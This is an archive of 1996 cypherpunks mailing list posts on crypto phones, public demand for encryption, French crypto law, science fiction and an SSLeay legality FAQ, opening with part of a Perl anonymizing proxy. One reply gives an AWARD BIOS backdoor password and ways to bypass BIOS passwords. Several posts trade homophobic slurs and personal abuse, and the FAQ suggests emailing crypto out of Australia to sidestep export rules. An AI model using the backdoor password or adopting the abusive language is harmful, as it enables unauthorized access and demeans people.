  if ($pid) {			# spawn OK, and I'm the parent
    close $connection;
    return;
  }
  ## spawn failed, or I'm a good child
  my $request = $connection->get_request;
  if (defined($request)) {
    my $response = &fetch_request($request);
    $connection->send_response($response);
    close $connection;
  }
  exit 0 if defined $pid;	# exit if I'm a good child with a good parent
}

sub fetch_request {
  my $request = shift;		# HTTP::Request

  use HTTP::Response;

  my $url = $request->url;
  warn "fetching $url";
  if ($url->scheme !~ /^(http|gopher|ftp)$/) {
    my $res = HTTP::Response->new(403, "Forbidden");
    $res->content("bad scheme: @{[$url->scheme]}\n");
    $res;
  } elsif (not $url->rel->netloc) {
    my $res = HTTP::Response->new(403, "Forbidden");
    $res->content("relative URL not permitted\n");
    $res;
  } else {
    &fetch_validated_request($request);
  }
}

sub fetch_validated_request {
  my $request = shift;	# HTTP::Request

  ## uses global $AGENT

  ## warn "orig request: <<<", $request->headers_as_string, ">>>";
  $request->remove_header(qw(User-Agent From Referer Cookie));
  ## warn "anon request: <<<", $request->headers_as_string, ">>>";
  my $response = $AGENT->request($request);
  ## warn "orig response: <<<", $response->headers_as_string, ">>>";
  $response->remove_header(qw(Set-Cookie));
  ## warn "anon response: <<<", $response->headers_as_string, ">>>";
  $response;
}


------- End of Forwarded Message






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 21 Nov 1996 08:35:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why I Don't Read SF Much Anymore (fwd)
In-Reply-To: <m0vQZy8-0000neC@mirage.skypoint.com>
Message-ID: <v03007800aeba35a0682d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:19 AM -0600 11/21/96, Charles Gimon wrote:

>> - Vernor Vinge, "True Names," obviously, "The Peace War," "Marooned in Real
>> Time," "A Fire Upon the Deep," and his collections of short stories (incl.
>> "The Ungoverned").
>>
>> (Caveat: I've been invited to do a chapter for Vinge's forthcoming "True
>> Names" book, containing essays about computers and society, and, of course,
>> his novella of the same name. So I may be biased.)
>>
>
>Is this the St. Martin's Press "True Names" edition that was listed in
>amazon.com? At one time, it was going to be released August or Sept. of this
>year.

Yes. It has been delayed 'til next summer.

>I have to mention that the owner of Dreamhaven Books here in Minneapolis
>complained to me last year that he has a "truckload" of remaindered copies
>of "Peace War". They still have a bunch--every time I've been in there,
>there's a hardbound "Peace War" on display with a price tag of $1.00.
>Buying a copy of "True Names" right now is about as easy as buying an
>original Dead Sea Scroll--but if anybody wants a cheap copy of "Peace War",
>look up Dreamhaven in Minneapolis.

An artifact of the pulp age. Publishers try to estimate demand, then
publish that many copies. Usually they guess wrong. Hence, remainders. And
recycling into more pulp.

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 21 Nov 1996 08:54:28 -0800 (PST)
To: Grubby <aga@dhp.com>
Subject: Does Grubor EAT ASSHOLE?  Yes, he eats himself.
In-Reply-To: <Pine.LNX.3.95.961121051941.15546B-100000@dhp.com>
Message-ID: <Pine.SUN.3.91.961121081411.23773A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The following is truly noise.  Please ignore it and forgive me 
for playing with the animals.  They are just so much fun when 
they begin to froth at the mouth.  In some ways it's like picking 
at a scab to see what's underneath.

Grubby,

How do you like my NEW Subject line?  Now don't change it, 
because that would be "the worst kind of censorship."  ;-)
So why the big hard-on against John?  Did he turn down your 
advances because he's straight?  Latents who are in denial like
you are so pathetically impotent.  

By the way, I guess you've wimped out on your "threat" not to 
respond to posts CCed to the Cypherpunks list.  (Feel free not 
to respond to this post.  That'll teach me.)

I noted your kickboxing "challenge" in another post.  Obviously, 
you crave physical contact with other men, but cannot admit it to 
yourself, so you seek it through "combat."  Wouldn't Greco-Roman 
wrestling be more your style?  Why you've even got a Greek in 
your group who would probably love it.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Thu, 21 Nov 1996 08:50:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: [TARGET ACQUIRED] Cryptography in France
Message-ID: <199611211647.IAA15836@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 4:46 PM 11/21/1996, Thomas Hennes wrote:
>I'm not an anarchist, nor am I illuminated. I'm a regular guy with a
>regular job. I'm simply tired of all these self-proclaimed important
>people that live in the fast lane with MY taxes. And crypto would be a
>mean for me to combat them more efficiently and to bring back some of
>that much-needed social equilibrium. And, the hell with it, I want
>GUARANTEED PRIVACY.

Here's our target!  France is the perfect testing ground for a
top-notch cryptoanarchist system.  Lots of computers, lots of smart
users, high taxes, and a police state.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Wed, 20 Nov 1996 23:11:56 -0800 (PST)
To: aga@dhp.com (aga)
Subject: Re: The Limey PUNK needs TERMINATED
Message-ID: <199611211110.JAA21413@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


I saw what happened. It's very sad.



George

P.S. Nobody can threaten another site or another invidual and keep
     one's humanity for too long. I often regret angry emotions,
     as we all do. The saddening thing is when threats get _too_ far.
     I cannot control anybody's behaviour, nor have endless energy
     to explain things. I am but an ignorant little cog in the Wheels
     most of the time, and need an atmosphere of trust like everybody.
     I can see truth buried under a lot of people's rudeness, and I
     can see violence buried in a lot of people's politeness. Silence
     is sometimes the best policy. I do not enforce it on anybody.
     I take a vow of silence when saying anything makes things worse.





     














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <clay.olbon@dynetics.com>
Date: Thu, 21 Nov 1996 06:11:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mass-market crypto phones
Message-ID: <1.5.4.32.19961121141010.006da9a4@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
device (http://www.comsec.com/).  The point of this post is to posit a
scenario based on the implications of this product.  This is speculation
based on where I think such products should be heading.

I think we need to keep a couple of goals in mind.  The first, is to get
encrypting phones (or phone add-ons) into Wal-mart, K-mart, etc (where
probably most Americans now buy their phones).  The prices need to be low
enough that people will want to buy them (<$100?).  Is this technically
feasible?  The comsec device from the above URL already demonstrates the
needed capability.  Is the cost target possible?  My guess is soon, given
the lowering costs and increasing capabilities of current processors.

The second goal needs to be to push a similar product for cell-phones.  I
think this will be perhaps an easier sell, given the higher initial cost for
these phones, and their reduced security.  Perhaps a home device could be
sold with the cell-phone as a package deal, so that communications with the
"home base" (i.e your office, home, etc) would be secure.  With the rapid
growth in cell-phone sales, selling a package such as this might ensure a
larger user-base of home devices.

Given that these goals are met, I think widespread use of crypto over phone
lines would become almost inevitable.  However, the fun part would be the
introduction of such products.  The FUD coming from police, the government,
etc. would be amazing to behold.

        Clay



*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Wilson <serw30@laf.cioe.com>
Date: Thu, 21 Nov 1996 06:32:33 -0800 (PST)
To: Kamil Golombek <Zero@mrkev.vabo.cz>
Subject: Re: Magic passwodr in BIOS?
Message-ID: <1.5.4.32.19961121142941.0085b630@gibson.cioe.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 11/21/96 +0100, you wrote:
>Hi,
>	yesterday I've read about so called "magic password" in AWARD BIOS. It
>was a surprise for me and I wasn't very happy that the way how to bypass
>this is so easy. But nevermind, I heve two questions about it. 	First,
>is there any way how to disabled "magic password" 589589 in AWARD BIOS?
>	Second, does anobody know another "magic passwords" to various BIOSes? 
>
>		Thanks for your answers!
>				ZERO
>
>
I wouldn't be too disappointed with a hole in BIOS password security. Most
of them can be easily defeated by a jumper switch, or shorting a pin on the
system board. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 21 Nov 1996 09:37:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Mass-market crypto phones
Message-ID: <v02140b04aeba4390566a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>A while back, Eric Blossom posted a URL for a mass-market, phone encyrption
>device (http://www.comsec.com/).  The point of this post is to posit a
>scenario based on the implications of this product.  This is speculation
>based on where I think such products should be heading.
>
>I think we need to keep a couple of goals in mind.  The first, is to get
>encrypting phones (or phone add-ons) into Wal-mart, K-mart, etc (where
>probably most Americans now buy their phones).  The prices need to be low
>enough that people will want to buy them (<$100?).  Is this technically
>feasible?  The comsec device from the above URL already demonstrates the
>needed capability.  Is the cost target possible?  My guess is soon, given
>the lowering costs and increasing capabilities of current processors.

I've worked with these products, while at Cylink, and don't think it will
be posible to reach your $100 figure for a standalone device without
manufacturing volumes of 100,000/month or so--even AT&T's attempt at a
similar device was priced considerably higher.  Given the lack of general
population interest it is very unlightly a market of this volume will
develop.  A more likely scenario is the inclusion of this technology in a
digital cordless phone, since the A/D-D/A circuits are already part of the
design--some analog units already include scrambling circuits--although
increased power consumption and therefore either power supply weight or
decreased talk and standby times could become a maketing problem.  If
you're interested go contact one of the many Asian consumer electronics
companies (see http://www.asiansources.com> tell them how many 10,000's of
units you're willing to buy and have them built for U.S. resale.

>
>The second goal needs to be to push a similar product for cell-phones.  I
>think this will be perhaps an easier sell, given the higher initial cost for
>these phones, and their reduced security.  Perhaps a home device could be
>sold with the cell-phone as a package deal, so that communications with the
>"home base" (i.e your office, home, etc) would be secure.  With the rapid
>growth in cell-phone sales, selling a package such as this might ensure a
>larger user-base of home devices.

Again inclusion in a digital phone is easiest and best, but then again its
already digital and if GSM probably encrypted over the air. Cylink's
briefcase-sized SecureCell was never a success (too heavy and expensive).
Maintaining a >9600bps stable modem link via analog cellular still isn't
easy (even when stationary), but has improved with the availability of
specialized modems.  However, you're right that many more users will be
willing to pay and could be a winning combo.  I'm not sure interconnection
of such a device with most miniature cell phones would be a slam dunk.

>
>Given that these goals are met, I think widespread use of crypto over phone
>lines would become almost inevitable.  However, the fun part would be the
>introduction of such products.  The FUD coming from police, the government,
>etc. would be amazing to behold.
>
>        Clay
>
>
>
>*******************************************************
>Clay Olbon                          olbon@ix.netcom.com
>engineer, programmer, statistitian, etc.
>**********************************************tanstaafl






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Thu, 21 Nov 1996 07:40:12 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: Anderson & Kuhn's "Improved DFA" paper
Message-ID: <199611211539.JAA01275@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


> It's also an opportunity for some well-timed press releases.
> Clipper 1's reputation was severely damaged by Matt's attack.
> Anybody know if HP's giving out samples, and if there are real or test
> GAK plugins for them?

I agree. There are many people on the list with contacts with the 
media (or ARE the media :).  There was a time that I would suggest 
posting all of our media lists to cypherpunks but, unfortunately, I 
fear that would no longer be productive.  So...

I suggest everyone fire up their fax modems and send out to all of 
the contacts we each have personally.  Even local papers can be 
important in this action.  Make sure your local ISPs understand the 
issues (and maybe even release it in a newsletter or daily email.

> 
> HP URL http://www.dmo.hp.com/gsy/security/icf/main.html
> 
> The paper was posted to coderpunks, and it's on 
>         ftp://ftp.cl.cam.ac.uk/users/rja14/dfa
> Here's the intro:
> ---------------------------------------------------------------------
>                    Improved Differential Fault Analysis
> 
>                       Ross J Anderson, Markus G Kuhn
> 
(Intro snipped) 

Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Miller <jonmill@frds.com>
Date: Thu, 21 Nov 1996 09:47:42 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: This AGA d0od
Message-ID: <c=US%a=_%p=Fisher-Rosemount%l=RDSMAIL-961121094930Z-4@rdsmail.frds.com>
MIME-Version: 1.0
Content-Type: text/plain


Enough is enough already....  I've spoken with your dad and it's no more
Innerspace Invaders for you.  He said you're UNgrounded for two months,
and while you're not outside looking for a real life and real friends,
you must sit in front of the TV and watch Sesame Street and Mr. Rogers
reruns back-to-back on PBS.

After learning to feel good about yourself with Fred's help, it's off to
a session with Dr. Ruth to help you realize you can make yourself feel
good as well.  It is O.K. to touch yourself as long as you're in
private.  We promise not to make fun of you.

-----------------
>From: 	aga[SMTP:aga@dhp.com]
>Sent: 	Thursday, November 21, 1996 2:24 AM
>To: 	Rabid Wombat
>Cc: 	FREEDOM-KNIGHTS@JETCAFE.ORG; Black Unicorn; cypherpunks@toad.com
>Subject: 	Re: Does John Gilmore EAT Asshole?
>
>On Wed, 20 Nov 1996, Rabid Wombat wrote:
>> Grubby! Back under your rock!

AGA responded:
>FUCK YOU COCKSUCKER -- as long as you keep writing to be,
>I will continue to rip a new asshole in the Faggot John Gilmore
>who promotes PUNKs like you.
>
>A 'punk' is a faggot pussy who is really NOT a man!
>
>> On Wed, 20 Nov 1996, aga wrote:
>> 
>> > Somebody censored the header in this article,
>> > and we put it back.  You know, that is the worst
>> > kind of censorship, when somebody attempts to avoid the issue.
>> 
>
>The faggot Gilmore does take it up the ass and also eat assholes, so
>he should be added to the net.scum list at once.
>
>-a
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Kirksey <kkirksey@appstate.campus.mci.net>
Date: Thu, 21 Nov 1996 07:08:41 -0800 (PST)
To: "Duncan Frissell" <frissell@panix.com>
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <199611211505.KAA28573@appstate-01.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


>The problem with straight SF for me is that computers and networks have
>changed the future so much that (in the words of the motto of the SF
>Writer's Association) The Future Ain't What It Used to Be.  The science
>fictional futures of my childhood are now dead as doornails.

I still enjoy some of the "old stuff", but not in the same way that I did 
when I was younger. I read those works as period pieces now.  There is a 
certain romance in the Gersnbackian view of the future that I enjoy, 
especially in contrast to the Grim and Gritty (TM) "reality" of most 
modern and post-modern SF.  I still find Heinlein's juveniles to be fun 
reads, probably for this reason.  Ditto for Edgar Rice Burroughs's Mars 
books.

>And I can't
>enjoy contemporary SF that doesn't include a healthy dose of computers and
>networking.  

Computers and networking may not be central to the story the author is 
trying to tell. And with the way things are going, computers and 
networking will become (some would say already have become) such an 
integral part of the culture that they don't warrant special attention.  
Kinda like airplanes, automobiles, television, radio, microwave ovens, 
cellular phones, ad infinitum.  Computer Networks were a new and nove 
idea when _Shockwave Rider_ was written, but now with every car and 
cereal commercial on TV promoting a web site as well, it's not all that 
exciting anymore.

As far as keeping up with current SF, I, like others, don't seem to make 
as much time to read as I used to.  I rely on Gardner Dozios' annual 
_Year's Best Science Fiction_ anthology to keep me up to date and 
introduce me to new writers.  I've always enjoyed the stories he's 
chosen, some more than others, and he's introduced me to some great 
writers that I probably wouldn't have heard about otherwise: Greg Egan, 
Connie Willis, and Terry Bisson, to name a few.  Judging from your 
comments, I think you'd like Greg Egan, especially his novel _Permutation 
City_.

Ken






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Thu, 21 Nov 1996 10:09:48 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <3.0b36.32.19961121100706.0100acac@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 11/21/96 -0800, Timothy C. May wrote:
>
>On the issue of why many of us don't read as much SF as we once did...
>
>Speaking for myself,
[Reasons snipped]

I have found my reasons for not reading as much Science Fiction are:

1) Time.

2) The huge pile of technical manuals/books that I need to read.  (I have
been measuring them, not in number of books, but in linear feet.)

3) Many of the bookstores locally (especially the chains) have a HUGE
percentage of their books being "franchise SF".  It is hard to find
something good when you have to wade through the Star Trek, Star Wars,
Doom, Myst, Story set in the world of <famous name> by written by
<unknown>, and assorted Pern-ography.  (The last chain bookstore I went to
had *NOTHING* that I had not read or was willing to read.)  I guess that is
what i get for going to malls...

ObCrypto:  It is ironic that the 2nd edition of The Codebreakers is out.  I
had just done a book search on it and was going to get a local bookstore to
order me a copy.  (The prices on the used market ran anywhere from $20 to
$80!  That is copied that actually sold, not just asking price.)

I guess I will have to do a book search on _The Puzzle Palace_ and maybe it
will get released. (In kind of a strange quantum bookbuying action at a
distance sort of thing...)


---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 21 Nov 1996 10:21:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: The public sees no need for crypto at this time
In-Reply-To: <1.5.4.32.19961121141010.006da9a4@ix.netcom.com>
Message-ID: <v03007800aeba463ea301@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I believe that at this time the differential market value to customers of
having strong crypto in telephones is near-zero, and in cell-phones is only
slightly greater. My reasons will follow below.

I'm explicitly discussing "things as they are" rather than "things as they
should be."

At 9:10 AM -0500 11/21/96, Clay Olbon II wrote:

>I think we need to keep a couple of goals in mind.  The first, is to get
>encrypting phones (or phone add-ons) into Wal-mart, K-mart, etc (where
>probably most Americans now buy their phones).  The prices need to be low
>enough that people will want to buy them (<$100?).  Is this technically
>feasible?  The comsec device from the above URL already demonstrates the
>needed capability.  Is the cost target possible?  My guess is soon, given
>the lowering costs and increasing capabilities of current processors.

While I would certainly _like_ to see wider use of crypto, and crypto
deployed ubiquitously in products like telephones, cellphones, pagers, and,
of course, computers and networks, I think any honest appraisal of market
conditions must conclude that there is little _average American_ awareness
of, or demand for, crypto.

One could cite many reasons. Here are some that I see. (Note: I'm not
saying these are true for me and thee, nor for everyone else. And these
reasons may change with time. But for now, I think they're pretty accurate.)

* Most people don't think they're targets of wiretapping. They don't think
the FBI is tapping their phones, and they've never even heard of the NSA,
let alone GCHQ, NRO, SDECE, etc.

* "What have I got to hide?"

* Given a choice to use ordinary phone lines or cordless handsets, with
attendant ease-of-eavesdropping issues, they'll take the convenience of
cordless handsets nearly every time. (And the 900 MHz increase-security
cordless handsets are not yet in heavy demand...they'll succeed when
they're as cheap as ordinary cordless phones.)

* Security always takes some effort. The military can have it only by
having elaborate protocols, checks and balances, and essentially full-time
"crypto" personnel to go through the rigamarol of setting up secure
communications and locking up key material according to elaborate
procedures.

(I like to cite the evolution of metal safes. Mosler Safe Company says the
driving force behind safe design, and deployment to merchants and banks,
was the _insurance business_. Instead of preaching about the value of
increased security, the insurers--who knew how to take the long
view--offered rate discounts if stronger safes were installed. Voila,
stronger safes. Until similar incentives exist for data--e.g., insurance
for loss of patient records, confidential dossiers, etc.--I doubt most
people will listen to the "preaching.")

* Look at how few people--myself included--routinely use crypto (digital
signatures, etc.) here on this list! It is now "worth it" to me to
digitally sign all messages. (Please, don't send me your personal
experiences or your scripts for interfacing Pegasus Zapmail to PGP 2.8!)

* Even those with secure phones--STU-IIIs and Clipperphones--admit that
they rarely use the features. (Recall several stories where advocates of
Clipper had to take the books and magazines piled up on top of their
Clipperphones, dust them off, and try to remember how to initiate a secure
conversation!)

* And this raises the problem of: whom do you communicate with securely? If
your friends and family don't have compatible hardware, what's the point?
Sure, some corporations and enterprises will take the plunge and buy sets
of units, but Joe Public will likely not, at least not until a critical
mass of compatible crypto is installed...perhaps a decade or more from now.

* In short, most people don't see the need. They're not doing things they
think would warrant surveillance, and they have no experience with bad
effects from wiretaps or whatnot. Just not on their list of things to worry
about. And they don't want the additional confusion, learning, and
incompatibility with what their friends and coworkers have.

As to the larger issue of "edcucating the public," I think this is almost
always an exhausting and fruitless task. Do-gooders have been trying this
for decades, even longer.

(Don't let me stop you, anyone. But I think it's unlikely that a new
campaign to educate people about a potential risk that they have never seen
any concrete evidence for in their own lives is going to do much.)

When crypto is cheap enough, it may be a selling factor for a consumer
making a choice. How much extra people are willing to pay is unclear. And
there are "sophisticated users" who may pay extra for such features.

And certainly there does not have to be "wide acceptance" for crypto to be
deployed to the "point of no return" (hint: this is a more important goal
to me than acceptance by Joe Public). For example, the SSL and SWAN stuff
is incredibly important, because wide encryption of network traffic, even
if Joe and Jane Public are not using crypto at home, means surveillance and
vacuum-cleaner types of NSA monitoring are made ten thousand times more
difficult. Which may be enough to secure for us the blessings of crypto
anarchy.

P.S. I'll be away at the Hackers Conference in Santa Rosa, CA for the next
several days, and then travelling for the American holiday of Thanksgiving
Day. So, I'll be mostly away from the list for a while.

--Tim May



>The second goal needs to be to push a similar product for cell-phones.  I
>think this will be perhaps an easier sell, given the higher initial cost for
>these phones, and their reduced security.  Perhaps a home device could be
>sold with the cell-phone as a package deal, so that communications with the
>"home base" (i.e your office, home, etc) would be secure.  With the rapid
>growth in cell-phone sales, selling a package such as this might ensure a
>larger user-base of home devices.
>
>Given that these goals are met, I think widespread use of crypto over phone
>lines would become almost inevitable.  However, the fun part would be the
>introduction of such products.  The FUD coming from police, the government,
>etc. would be amazing to behold.
>
>        Clay
>
>
>
>*******************************************************
>Clay Olbon			    olbon@ix.netcom.com
>engineer, programmer, statistitian, etc.
>**********************************************tanstaafl


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 21 Nov 1996 10:28:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [TARGET ACQUIRED] Cryptography in France
In-Reply-To: <199611211647.IAA15836@abraham.cs.berkeley.edu>
Message-ID: <v03007801aeba4f92d42b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:47 AM -0800 11/21/96, John Anonymous MacDonald wrote:

>Here's our target!  France is the perfect testing ground for a
>top-notch cryptoanarchist system.  Lots of computers, lots of smart
>users, high taxes, and a police state.

Not likely.

I gave a talk a couple of years ago in France (well, Monte Carlo, actually,
but the conference was heavily francocentric), and it was clear to me that
France is in the Dark Ages on these issues.

Sure, they've got "Minitel," an ostensibly ubiquitous network. But Minitel
is actually a primitive, sub-Prodigy-class system, controlled by the
government of France and associated special interests (France Telecom,
etc.).

The number of French persons actively on the Internet is fairly low--ask
yourself how many ".fr" domain names you've seen lately, and when you last
saw one on Cypherpunks? I see many more Finnish and even New Zealand domain
names.

Further, encryption is heavily restricted in France. As one French friend
put it, "You can apply for a license to use crypto--the same way you would
apply for a license to buy your own Exocet missile."

So, France is somewhere near the bottom of my list of fertile grounds for
crypto anarchy.

--Tim May



Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Nov 1996 07:39:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: ROB_not
Message-ID: <1.5.4.32.19961121153730.006b3b74@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


11-21-96. NYP:

"Treasury Report Will Oppose Federal Taxes on Internet Sales"

   Issues of key escrow, digital cash, anonymous transactions,
   and identifying where in the world transactions occur. Feds claim 
   they differ from greedy states who want to rob the Net golden 
   goose. The report will be posted to www.ustreas.gov for comment.
   (Not there yet at 10:30 EST.)

-----

http://jya.com/robnot.txt

ROB_not






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjh@osa.com.au
Date: Wed, 20 Nov 1996 15:43:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: SSLeay Legality FAQ
Message-ID: <199611202352.KAA04408@rosella.osa.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Folk,

Here's version 1.4 of the SSLeay Legality FAQ.  Additions since 1.3 are
in the areas of import/export controls in various countries.

Enjoy!

---------------------------------- Cut Here ----------------------------------

			SSLeay Legality FAQ Version 1.4

Outline:
	Disclaimer
	Legality/Patent Rights table
	Export Considerations
	Patent Considerations
	References
	For more information
	Credits

Disclaimer:

This document may contain gross errors, and neither Clifford Heath nor Open
Software Associates Limited accept any liability for same.  Users should do
their own research and receive professional legal advice.

With regard to the legalities of using SSLeay, there is a number of
geographical considerations, and a number of kinds of legal considerations.

Legality/Patent Rights table:

I've broken the legal considerations into "legal" (will the govt come after
you :-) and "license" (who do you need to pay patent royalties to).

Algor:	Location:	Purpose:	Legal:		License:	Ref:

DES	world-wide	any		mostly#		public domain
RSA	US		indiv/free	only RSAref	free		RSA
RSA	US		commercial	RSAref/BSAFE	from RSADSI*	RSA
DH	US		?		mostly#		Cylink+
DSA/DSS	(based on Diffie-Hellman)
RC4/2	US		any		mostly#		from RSADSI	RSA
RC4	elsewhere	any		mostly#		seems safe
IDEA	US/Europe/Japan	indiv/free	mostly#		free		ASCOM
IDEA	US/Europe/Japan	indiv/commercial mostly#	$US15, ASCOM	ASCOM
IDEA	US/Europe/Japan	company site	mostly#		from ASCOM	ASCOM
IDEA	elsewhere	any		mostly#		free
SAFER	world-wide	any		mostly#		free		Safer
MD2	world-wide	PEM only	yes		free@		rfc1319
MD5	world-wide	any		yes		free@		rfc1321
SHA	world-wide	any		yes		free		
Any(!)	France		any		only with (almost unobtainable) permit
Any(!)	Russia		any		only with permit

Notes:
* RSADSI's patent on RSA (#4,405,829) runs out on 20 Sep 2000.  RSAref is free
  under certain terms, otherwise can be licensed through Concensus.  BSAFE is
  stronger and has RC4 but requires purchase and royalties: $25K up front,
  royalties the larger of 2% or $2, royalty prepayment of $5000 per annum
  required in subsequent years covers 50% of royalties over the following year.
+ DH by itself cannot be used for digital signatures - the El Gamal extension
  provides this. CYLINK claim their DH patent covers El Gamal.  The US patent
  #4,200,770 runs out on 29 April 1997.  The Canadian patent (#1,121,480)
  registered 6 April, 1982, runs out in 1999.
@ Acknowledgement is required - see the RFC.
# Many countries have nominal export controls, including the UK and Australia,
  but I only know of them being enforced in the USA.  MD2/5 and SHA are not
  subject to export controls anywhere that I know of.

Export considerations:

The USA has regulations under ITAR (International Trade in Arms Regulations)
which categorises "cryptographic and ancillary devices" as munitions.
Two classes of export licenses are granted: Distribution Licenses or DL's
and Individual Validated Licenses or IVL's.

To get an IVL you must say who the customer is and why he needs DES (or 3X
DES, etc.).  One may then use the IVL to export to the approved end user.
Thousands are granted every year and very few applications are rejected.

Systems which use cryptography for decryption only, authentication only
(e.g. Kerberos authentication as available from Cybersafe and others), or
can only be used for protecting financial data (e.g Cybercash etc., as long
as it cannot be used for arbitrary messaging) are more-or-less readily
granted a DL.  DLs have also been granted for some implementations of
RC4/40 bits (e.g Netscape).

Canada has back-to-back agreements with the USA's ITAR controls, so it's
easy to get crypto from the USA to Canada but you can't export from Canada.
More information is available from Customs Canada (Revenue Canada) and
Department of External Affairs and these URLs:
http://axion.physics.ubc.ca/ECL.html - Excerpts from the Export Control List
of Canada, and http://insight.mcmaster.ca/org/efc/pages/doc/crypto-export.html
Canada's export controls.

Many other countries have export controls (UK, Australia and others), but
enforcement is less stringent than in the USA.  In Australia, export of
cryptographic software is controlled by Customs Regulations 13B (military
technology) and 13E (Dual Use Technology).  The regulations are administered
by the Defence Signals Directorate - mail to "Director, Strategic Trade
Policy and Operations, Dept of Defence, Anzac Park West Offices APW1-1-OA1,
Canberra, ACT" or fax (06)266-6412 and ask for their "Australian Controls
on the Export of Technology with Civil and Military Applications".  The
Australian regulations are also online at http://www.austlii.edu.au/cgi-bin/sinodisp.pl/au/legis/cth/consol_reg/cer439/sch13.html
Software is defined as "one or more programs fixed in any tangible medium of
expression", which explicitly leaves electronic shipment uncontrolled.
Don't carry or mail media with SSLeay-based software out of Australia -
email or FTP it instead!

The UK Gov't is funding a project at Royal Holloway College which contains
Key Escrow provisions.  Watch for the EC DGXIII introducing European
legislation under the banner "European Trusted Services", or visit
http://www.modeemi.cs.tut.fi/~avs/eu-crypto.html, 
